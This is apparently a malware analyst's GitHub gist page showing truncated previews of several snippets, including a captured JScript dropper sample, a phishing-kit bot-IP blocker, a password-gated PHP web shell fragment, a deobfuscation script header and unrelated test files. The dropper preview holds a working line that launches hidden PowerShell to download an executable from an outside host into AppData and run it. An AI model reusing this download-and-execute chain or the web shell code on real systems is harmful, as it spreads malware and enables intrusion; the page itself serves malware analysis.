From 0 to hero in 60 seconds!
I often run into unknown samples which I need to quickly deobfuscate.
Scripts can often be malfomred (who has time for QA) and not play nicely during a quick dynamic analysis.
The following instructions are for setting up a local environment that will beautify and validate
Sean Wilson idiom
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var kCjxsSr = new ActiveXObject("wscripT.shell"); | |
| var ZSNIWGXR = kCjxsSr.RegRead(("HKLM\\sofTware\\MIcRosoft\\WindoWs\\CUrreNtverSioN\\PrOgraMFilesdir") | |
| var wJcfTMNd = 'XOoknqp.ShellExecute("cmd.exe", "/c ping localhost & powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden ('+ | |
| 'new-object system.net.webclient.downloadfile(\'http://memphistigershoover.com/3kosiezsixaigsuobvoyv.exe?bcZhTz\',\'%appDaTa%BKQ19.EXe\'); stARt-ProCess \'%appdaA%BKQ19.Exe\'",'+ | |
| ' "'+ | |
| '", "open", 0);'; | |
| var TBMfinGb = wJcfTMNd.replace(RegExp(ZSNIWGXR, "g"), ""); | |
| var XOoknqp = new ActiveXObject("sheLl.apPlIcatioN"); | |
| eval(TBMfinGb); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| @session_start(); | |
| error_reporting(0); | |
| function message(){ | |
| echo "HELLO"; // BOOTS MESSAGE | |
| exit; | |
| } | |
| $ips = array( // LIST BOOTS IP | |
| "^66.102.*.*", | |
| "^38.100.*.*", |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Limit GET POST> | |
| order allow,deny | |
| deny from 209.85.32.23 # totaldomaindata (checkmark) | |
| deny from 66.205.64.22 | |
| deny from 98.247.136.154 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $auth = "f20d65463f1f5bf4d5d87528a5e2004f"; //Hash of bl4ckv01d | |
| $url = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; | |
| function display_auth_form() { | |
| global $url; | |
| ?> | |
| <form action="<?php echo $url ?>" method="post"> | |
| <input type="password" id="pwd" name="pwd"> | |
| <input type="hidden" id="do_auth" name="do_auth"> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -u | |
| -k | |
| /h | |
| -s | |
| -e | |
| -pr | |
| -rq | |
| -q | |
| -c | |
| -l |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| |-------------------------------------------------------------------| | |
| | Quick analysis & decoding of the sample found by @___OD___ | | |
| | (https://twitter.com/___OD___/status/768097704115331073) | | |
| | | | |
| | @seanmw | | |
| |-------------------------------------------------------------------| | |
| Dropper: 8e84a56d5e46c903ece7fbfacd4380fc30933309 | |
| Payload: e1a2f786bfc0c50e9b7858283748d1f7928310d4 |
idiom
/ jbdecrypt.py
Created
June 6, 2016 15:10
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| import argparse | |
| ############################################################################################### | |
| ## | |
| ## String obfuscation decoder for Boleto themed java downloader | |
| ## Sample SHA256: dbc180e8c8506d7f56016c86edc0cca1a30a3e4e4239a42b813c1fdfd85b1dcf | |
| ## |
idiom
/ gist:75a6f8ae88cb72c6d47deb6c84835548
Created
May 9, 2016 00:29
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Keybase proof | |
| I hereby claim: | |
| * I am idiom on github. | |
| * I am idiom (https://keybase.io/idiom) on keybase. | |
| * I have a public key whose fingerprint is D53F A3EF 3ED0 88B9 654B 728A 9DD5 10F3 498F 39B3 | |
| To claim this, I am signing this object: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Imports System | |
| Public Module modmain | |
| Sub Main() | |
| Try | |
| Console.WriteLine ("Hello World using Visual Basic!") | |
| Catch e As Exception | |
| Throw e | |
| End Try | |
| End Sub |